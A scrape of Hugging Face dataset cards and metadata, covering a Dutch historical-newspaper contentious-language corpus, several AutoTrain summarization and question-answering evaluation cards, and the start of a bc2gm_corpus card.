> Cultural heritage institutions recognise the problem of language use in their collections. The cultural objects in archives, libraries, and museums contain words and phrases that are inappropriate in modern society but were used broadly back in times. Such words can be offensive and discriminative. In our work, we use the term "contentious" to refer to all (potentially) inappropriate or otherwise sensitive words. For example, words suggestive of some (implicit or explicit) bias towards or against something. The National Archives of the Netherlands stated that they "explore the possibility of explaining language that was acceptable and common in the past and providing it with contemporary alternatives", meanwhile "keeping the original descriptions [with contentious words], because they give an idea of the time in which they were made or included in the collection". There is a page on the institution website where people can report "offensive language".
>
>
>
### Source Data
#### Initial Data Collection and Normalization
>
> The queries were run on OCR'd versions of the Europeana Newspaper collection, as provided by the KB National Library of the Netherlands. We limited our pool to text categorised as "article", thus excluding other types of texts such as advertisements and family notices. We then only focused our sample on the 6 decades between 1890-01-01 and 1941-12-31, as this is the period available in the Europeana newspaper corpus. The dataset represents a stratified sample set over target word, decade, and newspaper issue distribution metadata. For the final set of extracts for annotation, we gave extracts sampling weights proportional to their actual probabilities, as estimated from the initial set of extracts via trigram frequencies, rather than sampling uniformly.
>
>
>
#### Who are the source language producers?
[N/A]
### Annotations
#### Annotation process
>
> The annotation process included 3 stages: pilot annotation, expert annotation, and crowdsourced annotation on the "Prolific" platform. All stages required the participation of Dutch speakers. The pilot stage was intended for testing the annotation layout, the instructions clarity, the number of sentences provided as context, the survey questions, and the difficulty of the task in general. The Dutch-speaking members of the Cultural AI Lab were asked to test the annotation process and give their feedback anonymously using Google Sheets. Six volunteers contributed to the pilot stage, each annotating the same 40 samples where either a context of 3 or 5 sentences surrounding the term were given. An individual annotation sheet had a table layout with 4 options to choose for every sample
>
>
> * 'Omstreden'(Contentious)
> * 'Niet omstreden'(Not contentious)
> * 'Weet ik niet'(I don't know)
> * 'Onleesbare OCR'(Illegible OCR)
> 2 open fields
> * 'Andere omstreden termen in de context'(Other contentious terms in the context)
> * 'Notities'(Notes)
> and the instructions in the header. The rows were the samples with the highlighted words, the tickboxes for every option, and 2 empty cells for the open questions. The obligatory part of the annotation was to select one of the 4 options for every sample. Finding other contentious terms in the given sample, leaving notes, and answering 4 additional open questions at the end of the task were optional. Based on the received feedback and the answers to the open questions in the pilot study, the following decisions were made regarding the next, experts' annotation stage:
> * The annotation layout was built in Google Forms as a questionnaire instead of the table layout in Google Sheets to make the data collection and analysis faster as the number of participants would increase;
> * The context window of 5 sentences per sample was found optimal;
> * The number of samples per annotator was increased to 50;
> * The option 'Omstreden' (Contentious) was changed to 'Omstreden naar huidige maatstaven' ('Contentious according to current standards') to clarify that annotators should judge contentiousness of the word's use in context from today's perspective;
> * The annotation instruction was edited to clarify 2 points: (1) that annotators while judging contentiousness should take into account not only a bolded word but also the context surrounding it, and (2) if a word seems even slightly contentious to an annotator, they should choose the option 'Omstreden naar huidige maatstaven' (Contentious according to current standards);
> * The non-required field for every sample 'Notities' (Notes) was removed as there was an open question at the end of the annotation, where participants could leave their comments;
> * Another open question was added at the end of the annotation asking how much time it took to complete the annotation.
>
>
>
#### Who are the annotators?
Volunteers and Expert annotators
### Personal and Sensitive Information
[N/A]
Considerations for Using the Data
---------------------------------
Accessing the annotations
-------------------------
Each example text has multiple annotations. These annotations may not always agree. There are various approaches one could take to calculate agreement, including a majority vote, rating some annotators more highly, or calculating a score based on the 'votes' of annotators. Since there are many ways of doing this, we have not implemented this as part of the dataset loading script.
An example of how one could generate an "OCR quality rating" based on the number of times an annotator labelled an example with 'Illegible OCR':
To take the majority vote (or return a tie) based on whether a example is labelled contentious or not:
### Social Impact of Dataset
This dataset can be used to see how words change in meaning over time
### Discussion of Biases
>
> Due to the nature of the project, some examples used in this documentation may be shocking or offensive. They are provided only as an illustration or explanation of the resulting dataset and do not reflect the opinions of the project team or their organisations.
>
>
>
Since this project was explicitly created to help assess bias, it should be used primarily in the context of assess bias, and methods for detecting bias.
### Other Known Limitations
Additional Information
----------------------
### Dataset Curators
Cultural AI
### Licensing Information
CC-BY
| [
"### Dataset Summary\n\n\nThis dataset contains extracts from historical Dutch newspapers containing keywords of potentially contentious words (according to present-day sensibilities). The dataset contains multiple annotations per instance, given the option to quantify agreement scores for annotations. This dataset can be used to track how words and their meanings have changed over time",
"### Supported Tasks and Leaderboards\n\n\n* 'text-classification': This dataset can be used for tracking how the meanings of words in different contexts have changed and become contentious over time",
"### Languages\n\n\nThe text in the dataset is in Dutch. The responses are available in both English and Dutch. Suggestions, where present, are only in Dutch. The associated BCP-47 code is 'nl'\n\n\nDataset Structure\n-----------------",
"### Data Instances",
"### Data Fields",
"### Data Splits\n\n\nTrain: 2720\n\n\nDataset Creation\n----------------",
"### Curation Rationale\n\n\n\n> \n> Cultural heritage institutions recognise the problem of language use in their collections. The cultural objects in archives, libraries, and museums contain words and phrases that are inappropriate in modern society but were used broadly back in times. Such words can be offensive and discriminative. In our work, we use the term \"contentious\" to refer to all (potentially) inappropriate or otherwise sensitive words. For example, words suggestive of some (implicit or explicit) bias towards or against something. The National Archives of the Netherlands stated that they \"explore the possibility of explaining language that was acceptable and common in the past and providing it with contemporary alternatives\", meanwhile \"keeping the original descriptions [with contentious words], because they give an idea of the time in which they were made or included in the collection\". There is a page on the institution website where people can report \"offensive language\".\n> \n> \n>",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\n\n> \n> The queries were run on OCR'd versions of the Europeana Newspaper collection, as provided by the KB National Library of the Netherlands. We limited our pool to text categorised as \"article\", thus excluding other types of texts such as advertisements and family notices. We then only focused our sample on the 6 decades between 1890-01-01 and 1941-12-31, as this is the period available in the Europeana newspaper corpus. The dataset represents a stratified sample set over target word, decade, and newspaper issue distribution metadata. For the final set of extracts for annotation, we gave extracts sampling weights proportional to their actual probabilities, as estimated from the initial set of extracts via trigram frequencies, rather than sampling uniformly.\n> \n> \n>",
"#### Who are the source language producers?\n\n\n[N/A]",
"### Annotations",
"#### Annotation process\n\n\n\n> \n> The annotation process included 3 stages: pilot annotation, expert annotation, and crowdsourced annotation on the \"Prolific\" platform. All stages required the participation of Dutch speakers. The pilot stage was intended for testing the annotation layout, the instructions clarity, the number of sentences provided as context, the survey questions, and the difficulty of the task in general. The Dutch-speaking members of the Cultural AI Lab were asked to test the annotation process and give their feedback anonymously using Google Sheets. Six volunteers contributed to the pilot stage, each annotating the same 40 samples where either a context of 3 or 5 sentences surrounding the term were given. An individual annotation sheet had a table layout with 4 options to choose for every sample\n> \n> \n> * 'Omstreden'(Contentious)\n> * 'Niet omstreden'(Not contentious)\n> * 'Weet ik niet'(I don't know)\n> * 'Onleesbare OCR'(Illegible OCR)\n> 2 open fields\n> * 'Andere omstreden termen in de context'(Other contentious terms in the context)\n> * 'Notities'(Notes)\n> and the instructions in the header. The rows were the samples with the highlighted words, the tickboxes for every option, and 2 empty cells for the open questions. The obligatory part of the annotation was to select one of the 4 options for every sample. Finding other contentious terms in the given sample, leaving notes, and answering 4 additional open questions at the end of the task were optional. Based on the received feedback and the answers to the open questions in the pilot study, the following decisions were made regarding the next, experts' annotation stage:\n> * The annotation layout was built in Google Forms as a questionnaire instead of the table layout in Google Sheets to make the data collection and analysis faster as the number of participants would increase;\n> * The context window of 5 sentences per sample was found optimal;\n> * The number of samples per annotator was increased to 50;\n> * The option 'Omstreden' (Contentious) was changed to 'Omstreden naar huidige maatstaven' ('Contentious according to current standards') to clarify that annotators should judge contentiousness of the word's use in context from today's perspective;\n> * The annotation instruction was edited to clarify 2 points: (1) that annotators while judging contentiousness should take into account not only a bolded word but also the context surrounding it, and (2) if a word seems even slightly contentious to an annotator, they should choose the option 'Omstreden naar huidige maatstaven' (Contentious according to current standards);\n> * The non-required field for every sample 'Notities' (Notes) was removed as there was an open question at the end of the annotation, where participants could leave their comments;\n> * Another open question was added at the end of the annotation asking how much time it took to complete the annotation.\n> \n> \n>",
"#### Who are the annotators?\n\n\nVolunteers and Expert annotators",
"### Personal and Sensitive Information\n\n\n[N/A]\n\n\nConsiderations for Using the Data\n---------------------------------\n\n\nAccessing the annotations\n-------------------------\n\n\nEach example text has multiple annotations. These annotations may not always agree. There are various approaches one could take to calculate agreement, including a majority vote, rating some annotators more highly, or calculating a score based on the 'votes' of annotators. Since there are many ways of doing this, we have not implemented this as part of the dataset loading script.\n\n\nAn example of how one could generate an \"OCR quality rating\" based on the number of times an annotator labelled an example with 'Illegible OCR':\n\n\nTo take the majority vote (or return a tie) based on whether a example is labelled contentious or not:",
"### Social Impact of Dataset\n\n\nThis dataset can be used to see how words change in meaning over time",
"### Discussion of Biases\n\n\n\n> \n> Due to the nature of the project, some examples used in this documentation may be shocking or offensive. They are provided only as an illustration or explanation of the resulting dataset and do not reflect the opinions of the project team or their organisations.\n> \n> \n> \n\n\nSince this project was explicitly created to help assess bias, it should be used primarily in the context of assess bias, and methods for detecting bias.",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\nCultural AI",
"### Licensing Information\n\n\nCC-BY"
] | [
"TAGS\n#task_categories-text-classification #task_ids-sentiment-scoring #task_ids-multi-label-classification #annotations_creators-expert-generated #annotations_creators-crowdsourced #language_creators-machine-generated #multilinguality-monolingual #size_categories-1K<n<10K #source_datasets-original #language-Dutch #license-cc-by-2.0 #newspapers #historic #dutch #problematic #ConConCor #region-us \n",
"### Dataset Summary\n\n\nThis dataset contains extracts from historical Dutch newspapers containing keywords of potentially contentious words (according to present-day sensibilities). The dataset contains multiple annotations per instance, given the option to quantify agreement scores for annotations. This dataset can be used to track how words and their meanings have changed over time",
"### Supported Tasks and Leaderboards\n\n\n* 'text-classification': This dataset can be used for tracking how the meanings of words in different contexts have changed and become contentious over time",
"### Languages\n\n\nThe text in the dataset is in Dutch. The responses are available in both English and Dutch. Suggestions, where present, are only in Dutch. The associated BCP-47 code is 'nl'\n\n\nDataset Structure\n-----------------",
"### Data Instances",
"### Data Fields",
"### Data Splits\n\n\nTrain: 2720\n\n\nDataset Creation\n----------------",
"### Curation Rationale\n\n\n\n> \n> Cultural heritage institutions recognise the problem of language use in their collections. The cultural objects in archives, libraries, and museums contain words and phrases that are inappropriate in modern society but were used broadly back in times. Such words can be offensive and discriminative. In our work, we use the term \"contentious\" to refer to all (potentially) inappropriate or otherwise sensitive words. For example, words suggestive of some (implicit or explicit) bias towards or against something. The National Archives of the Netherlands stated that they \"explore the possibility of explaining language that was acceptable and common in the past and providing it with contemporary alternatives\", meanwhile \"keeping the original descriptions [with contentious words], because they give an idea of the time in which they were made or included in the collection\". There is a page on the institution website where people can report \"offensive language\".\n> \n> \n>",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\n\n> \n> The queries were run on OCR'd versions of the Europeana Newspaper collection, as provided by the KB National Library of the Netherlands. We limited our pool to text categorised as \"article\", thus excluding other types of texts such as advertisements and family notices. We then only focused our sample on the 6 decades between 1890-01-01 and 1941-12-31, as this is the period available in the Europeana newspaper corpus. The dataset represents a stratified sample set over target word, decade, and newspaper issue distribution metadata. For the final set of extracts for annotation, we gave extracts sampling weights proportional to their actual probabilities, as estimated from the initial set of extracts via trigram frequencies, rather than sampling uniformly.\n> \n> \n>",
"#### Who are the source language producers?\n\n\n[N/A]",
"### Annotations",
"#### Annotation process\n\n\n\n> \n> The annotation process included 3 stages: pilot annotation, expert annotation, and crowdsourced annotation on the \"Prolific\" platform. All stages required the participation of Dutch speakers. The pilot stage was intended for testing the annotation layout, the instructions clarity, the number of sentences provided as context, the survey questions, and the difficulty of the task in general. The Dutch-speaking members of the Cultural AI Lab were asked to test the annotation process and give their feedback anonymously using Google Sheets. Six volunteers contributed to the pilot stage, each annotating the same 40 samples where either a context of 3 or 5 sentences surrounding the term were given. An individual annotation sheet had a table layout with 4 options to choose for every sample\n> \n> \n> * 'Omstreden'(Contentious)\n> * 'Niet omstreden'(Not contentious)\n> * 'Weet ik niet'(I don't know)\n> * 'Onleesbare OCR'(Illegible OCR)\n> 2 open fields\n> * 'Andere omstreden termen in de context'(Other contentious terms in the context)\n> * 'Notities'(Notes)\n> and the instructions in the header. The rows were the samples with the highlighted words, the tickboxes for every option, and 2 empty cells for the open questions. The obligatory part of the annotation was to select one of the 4 options for every sample. Finding other contentious terms in the given sample, leaving notes, and answering 4 additional open questions at the end of the task were optional. Based on the received feedback and the answers to the open questions in the pilot study, the following decisions were made regarding the next, experts' annotation stage:\n> * The annotation layout was built in Google Forms as a questionnaire instead of the table layout in Google Sheets to make the data collection and analysis faster as the number of participants would increase;\n> * The context window of 5 sentences per sample was found optimal;\n> * The number of samples per annotator was increased to 50;\n> * The option 'Omstreden' (Contentious) was changed to 'Omstreden naar huidige maatstaven' ('Contentious according to current standards') to clarify that annotators should judge contentiousness of the word's use in context from today's perspective;\n> * The annotation instruction was edited to clarify 2 points: (1) that annotators while judging contentiousness should take into account not only a bolded word but also the context surrounding it, and (2) if a word seems even slightly contentious to an annotator, they should choose the option 'Omstreden naar huidige maatstaven' (Contentious according to current standards);\n> * The non-required field for every sample 'Notities' (Notes) was removed as there was an open question at the end of the annotation, where participants could leave their comments;\n> * Another open question was added at the end of the annotation asking how much time it took to complete the annotation.\n> \n> \n>",
"#### Who are the annotators?\n\n\nVolunteers and Expert annotators",
"### Personal and Sensitive Information\n\n\n[N/A]\n\n\nConsiderations for Using the Data\n---------------------------------\n\n\nAccessing the annotations\n-------------------------\n\n\nEach example text has multiple annotations. These annotations may not always agree. There are various approaches one could take to calculate agreement, including a majority vote, rating some annotators more highly, or calculating a score based on the 'votes' of annotators. Since there are many ways of doing this, we have not implemented this as part of the dataset loading script.\n\n\nAn example of how one could generate an \"OCR quality rating\" based on the number of times an annotator labelled an example with 'Illegible OCR':\n\n\nTo take the majority vote (or return a tie) based on whether a example is labelled contentious or not:",
"### Social Impact of Dataset\n\n\nThis dataset can be used to see how words change in meaning over time",
"### Discussion of Biases\n\n\n\n> \n> Due to the nature of the project, some examples used in this documentation may be shocking or offensive. They are provided only as an illustration or explanation of the resulting dataset and do not reflect the opinions of the project team or their organisations.\n> \n> \n> \n\n\nSince this project was explicitly created to help assess bias, it should be used primarily in the context of assess bias, and methods for detecting bias.",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\nCultural AI",
"### Licensing Information\n\n\nCC-BY"
] |
cde011e595294d34ae7c648fcf788b153e762256 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-kmfoda__booksum-9ce97676-11915596 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T00:53:03+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["kmfoda/booksum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9", "metrics": [], "dataset_name": "kmfoda/booksum", "dataset_config": "kmfoda--booksum", "dataset_split": "test", "col_mapping": {"text": "chapter", "target": "summary_text"}}} | 2022-07-28T04:35:44+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9\n* Dataset: kmfoda/booksum\n* Config: kmfoda--booksum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9\n* Dataset: kmfoda/booksum\n* Config: kmfoda--booksum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
9ed5cb6a383d487c045f685388b32a12a5ad17c6 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-kmfoda__booksum-3fbf83bf-11925597 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T00:57:53+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["kmfoda/booksum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9", "metrics": [], "dataset_name": "kmfoda/booksum", "dataset_config": "kmfoda--booksum", "dataset_split": "test", "col_mapping": {"text": "chapter", "target": "summary_text"}}} | 2022-07-28T04:57:02+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9\n* Dataset: kmfoda/booksum\n* Config: kmfoda--booksum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9\n* Dataset: kmfoda/booksum\n* Config: kmfoda--booksum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
0342260156e61cc56a6f59314d0d5b036b985a39 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/led-base-book-summary
* Dataset: billsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-billsum-18299d18-11955600 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T02:49:36+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["billsum"], "eval_info": {"task": "summarization", "model": "pszemraj/led-base-book-summary", "metrics": [], "dataset_name": "billsum", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "text", "target": "summary"}}} | 2022-07-27T09:17:44+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/led-base-book-summary
* Dataset: billsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/led-base-book-summary\n* Dataset: billsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/led-base-book-summary\n* Dataset: billsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
3ab156a12e3f1fecc0271712a0709c4ff979715f | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-book-summary
* Dataset: billsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-billsum-a6bd4aa5-11965601 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T02:50:02+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["billsum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-base-16384-book-summary", "metrics": [], "dataset_name": "billsum", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "text", "target": "summary"}}} | 2022-07-27T20:10:35+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-book-summary
* Dataset: billsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-book-summary\n* Dataset: billsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-book-summary\n* Dataset: billsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
eae636f52231308429ea7b022850ba84f4cfd02b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: nlpconnect/roberta-base-squad2-nq
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ankur310794](https://huggingface.co/ankur310794) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-96a02c9c-11975602 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T09:24:18+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "nlpconnect/roberta-base-squad2-nq", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-27T09:27:23+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: nlpconnect/roberta-base-squad2-nq
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @ankur310794 for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: nlpconnect/roberta-base-squad2-nq\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ankur310794 for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: nlpconnect/roberta-base-squad2-nq\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ankur310794 for evaluating this model."
] |
201d9a9e3d04b1bc66894808a1699731e3d45c0b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: nlpconnect/roberta-base-squad2-nq
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ankur310794](https://huggingface.co/ankur310794) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-ef91144d-11985603 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T09:43:16+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "nlpconnect/roberta-base-squad2-nq", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-27T09:45:45+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: nlpconnect/roberta-base-squad2-nq
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @ankur310794 for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: nlpconnect/roberta-base-squad2-nq\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ankur310794 for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: nlpconnect/roberta-base-squad2-nq\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ankur310794 for evaluating this model."
] |
e24270fa1657929a060d81dc258fee812b3905f6 |
# Dataset Card for bc2gm_corpus
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** [Github](https://github.com/spyysalo/bc2gm-corpus/)
- **Repository:** [Github](https://github.com/spyysalo/bc2gm-corpus/)
- **Paper:** [NCBI](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC2559986/)
- **Leaderboard:**
- **Point of Contact:**
### Dataset Summary
[More Information Needed]
### Supported Tasks and Leaderboards
[More Information Needed]
### Languages
[More Information Needed]
## Dataset Structure
### Data Instances
[More Information Needed]
### Data Fields
- `id`: Sentence identifier.
- `tokens`: Array of tokens composing a sentence.
- `ner_tags`: Array of tags, where `0` indicates no disease mentioned, `1` signals the first token of a disease and `2` the subsequent disease tokens.
